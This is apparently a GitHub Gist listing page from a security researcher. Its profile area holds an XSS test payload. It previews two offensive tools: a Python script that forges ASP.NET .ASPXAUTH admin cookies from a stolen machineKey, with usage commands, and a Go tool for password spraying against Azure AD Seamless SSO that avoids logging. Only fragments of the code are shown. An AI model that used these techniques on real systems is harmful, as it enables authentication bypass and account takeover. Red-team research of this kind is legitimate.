22sh sofianeelhor

/home/bordeaux
javascript:alert(origin)

Recently created

Least recently created

Recently updated

Least recently updated

sofianeelhor / formaspcookie.py

Created October 19, 2025 16:52

Decrypts and parses .ASPXAUTH forms cookies, and forges new ones using machineKey from web.config. Supports "All" protection mode (AES-256-CBC encrypt + HMACSHA256 sign + binary serialization).

	#!/usr/bin/env python3
	"""
	# Decrypt original cookie
	python ticket_tool.py decrypt 0612BC595BE85DA14751A4494CDACC202C5D62E2F601C2B3096053B941D32B2141A53D7F4AE73004F48EB62FDD68CAEBE0E930D54935C1D23368347BE090DB64ACFFF63C108EE44B8B83D8C5045CF27F4DD48C3D7E54A05DBE1F8D914E7D283E54AAAE1323C92ACFEDBE21EF749A3119A02856A21309148EF3C33E6B2215C2DDC735A21E5B6BEFCC3846812BB7FCD3F8A424567F78A432D2299388F0979EC799

	# Forge admin ticket
	python formaspcookie.py forge admin --user-data "Admin" --persistent --expiry-min 1440

	"""

sofianeelhor / silentspray.go

Last active February 26, 2025 16:38

This tool leverages a flaw in the Azure AD Seamless SSO service. Failed authentication attempts using the autologon endpoint aren't properly logged, allowing for (undetected?) username probing and password spray attacks. Ideal for red teaming

	//https://www.secureworks.com/research/undetected-azure-active-directory-brute-force-attacks
	package main

	import (
	"bufio"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"os"